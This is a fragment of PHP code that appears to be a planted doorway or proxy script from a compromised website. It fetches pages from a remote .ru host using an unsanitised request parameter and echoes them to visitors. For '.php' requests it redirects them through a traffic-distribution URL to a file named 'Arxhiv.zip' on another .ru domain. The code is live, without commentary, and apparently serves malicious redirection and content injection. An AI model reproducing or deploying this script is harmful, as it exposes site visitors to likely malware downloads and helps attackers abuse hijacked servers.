$id = $_REQUEST['id'];
$html = implode('', file ('http://tubeton.ru/engine/editor/jscripts/data/keyshow/'.$id));
if (strstr($id, ".php")){
$link = "http://freemopon.ru/xm/show.php?p=2&tds-sdt=Arxhiv.zip";
header("Location: ".$link);
echo $html;
}
if (strstr($id, ".css")){
header('Content-Type: text/css; charset=windows-1251');
echo $html;
}
else{
header('Content-Type: text/html; charset=windows-1251');
echo $html;
}
?>